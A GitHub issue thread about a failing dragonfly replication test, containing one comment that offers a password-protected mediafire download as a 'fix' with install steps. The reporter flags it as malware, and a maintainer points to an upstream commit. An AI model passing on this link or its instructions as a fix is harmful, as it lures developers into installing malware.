### ISSUE TITLE
replication_test.py::test_expiry fails

### ISSUE THREAD

**Issue by kostasrim** [dragonflydb/dragonfly#3586]
See stack trace https://github.com/dragonflydb/dragonfly/actions/runs/10585760689/job/29333103864#step:6:903

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by kostasrim** [comment]
@rajnikyadav you are being reported for submitting malware

**Comment by chakaz** [comment]
I can't reproduce this, and it is likely to have been fixed by https://github.com/romange/helio/commit/ff2622222c9b0f091a37f466779cbfdc56df8344?diff=unified&w=0
